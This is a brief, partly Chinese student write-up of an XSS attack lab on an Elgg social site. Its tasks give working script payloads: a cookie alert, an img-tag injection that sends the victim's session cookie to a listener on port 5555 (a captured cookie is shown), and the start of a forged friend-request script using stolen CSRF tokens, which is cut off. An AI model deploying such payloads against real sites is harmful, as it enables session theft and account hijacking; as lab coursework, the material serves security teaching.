Cross-Site Scripting (XSS) Attack Lab网安实验
Lab Environment
the Apache server needs to be started.
$ sudo service apache2 start
3.2 Task 1: Posting a Malicious Message to Display an Alert Window
description有<p>标签,不会执行<script>代码内容。可以将恶意代码放入briefdescription中。
3.3 Task 2: Posting a Malicious Message to Display Cookies
同上,在BD中插入恶意代码
<script>alert(document.cookie);</script>
3.4 Task 3: Stealing Cookies from the Victim’s Machine
在BD中插入代码,基于CSRF攻击原理,给本机的5555端口发送信息
<script>alert(document.cookie);document.write('<img src=http://127.0.0.1:5555?c=' + document.cookie+'>')</script>
如图,接收到cookie为c=Elgg=f8168b9pg5tpc1u7bhp9i84gk2
3.5 Task 4: Becoming the Victim’s Friend
<script type="text/javascript">
window.onload = function () {
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var sendurl="/action/friends/add?friend=47" + ts + token + ts + token;
if (elgg.session.user.guid != 47